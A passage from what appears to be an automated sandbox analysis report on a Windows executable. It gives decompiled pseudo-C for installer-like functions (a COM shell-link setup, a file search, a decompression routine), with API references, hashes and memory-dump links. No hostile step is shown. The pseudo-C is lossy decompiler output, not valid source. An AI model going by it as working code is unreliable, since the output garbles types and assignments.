					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408534, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\alfons\\AppData\\Local\\Temp");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}






















                0x00402174
                0x0040217e
                0x00402188
                0x00402195
                0x004021a0
                0x004021a3
                0x004021bd
                0x004021c3
                0x004021c9
                0x004021cc
                0x004021d6
                0x004021da
                0x004021da
                0x004021df
                0x004021f0
                0x004021f8
                0x004022d4
                0x004022d4
                0x004022db
                0x004021fe
                0x004021fe
                0x0040220d
                0x00402211
                0x00402214
                0x0040221a
                0x00402228
                0x0040222b
                0x0040222d
                0x00402238
                0x00402238
                0x0040223d
                0x0040223f
                0x00402246
                0x00402246
                0x00402249
                0x00402252
                0x00402255
                0x0040225a
                0x0040225c
                0x00402269
                0x00402269
                0x0040226c
                0x00402278
                0x0040227b
                0x00402284
                0x0040228a
                0x00402291
                0x004022aa
                0x004022ac
                0x004022ba
                0x004022ba
                0x004022aa
                0x004022bd
                0x004022c3
                0x004022c3
                0x004022c6
                0x004022cc
                0x004022d2
                0x004022e7
                0x00000000
                0x00000000
                0x00000000
                0x004022d2
                0x004022dd
                0x00402a5d
                0x00402a69

                APIs
                • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00402230
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ByteCharCreateInstanceMultiWide
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 123533781-1943935188
                • Opcode ID: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                • Opcode Fuzzy Hash: 3c5799551ecf467b98758a7772b9f68a95bcaf766b99ab5d6102861f06629b87
                • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                Download Yara Rule
                C-Code - Quality: 39%
                			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406055(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E004060F7();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                0x004027b9
                0x004027cd
                0x004027d8
                0x004027d9
                0x00402918
                0x004027bb
                0x004027bb
                0x004027bd
                0x004027bf
                0x004027bf
                0x00402a5d
                0x00402a69

                APIs
                • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0
                Memory Dump Source
                • Source File: 00000000.00000002.248243732.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.248234341.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248254051.0000000000408000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.248263687.000000000040A000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248280292.0000000000415000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248287693.000000000041D000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248331314.000000000042C000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248350805.0000000000435000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.248358270.0000000000438000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: FileFindFirst
                • String ID:
                • API String ID: 1974802433-0
                • Opcode ID: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                • Opcode Fuzzy Hash: 4423a52aeb003c350b17b55cd02f29573d1ce5b782dbbfafeefecc88e991a537
                • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00406945, Relevance: .3, Instructions: 334COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 79%
                			E00406945(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004070B4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x408408; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x408408; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040711C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00407074))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a408 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a408 + __eax * 2) & 0x0000ffff =  *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3a8;
												if( *0x42e3a8 != 0) {
													L22:
													_t412 =  *0x40a42c; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a430; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d224; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d220; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d228;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6a8;
													if(_t416 < 0x42d6a8) {
														L15:
														__eflags = _t416 - 0x42d464;
														_t438 = 8;
														if(_t416 > 0x42d464) {
															__eflags = _t416 - 0x42d628;
															if(_t416 >= 0x42d628) {
																__eflags = _t416 - 0x42d688;
																if(_t416 < 0x42d688) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E0040711C(0x42d228, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d224, 0x40a42c, 0x42db28, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d228, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d228 + _t440;
														E0040711C(0x42d228, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d220, 0x40a430, 0x42db28, _t448 - 8);
														 *0x42e3a8 =  *0x42e3a8 + 1;
														__eflags =  *0x42e3a8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405C4B( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E004070B4( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
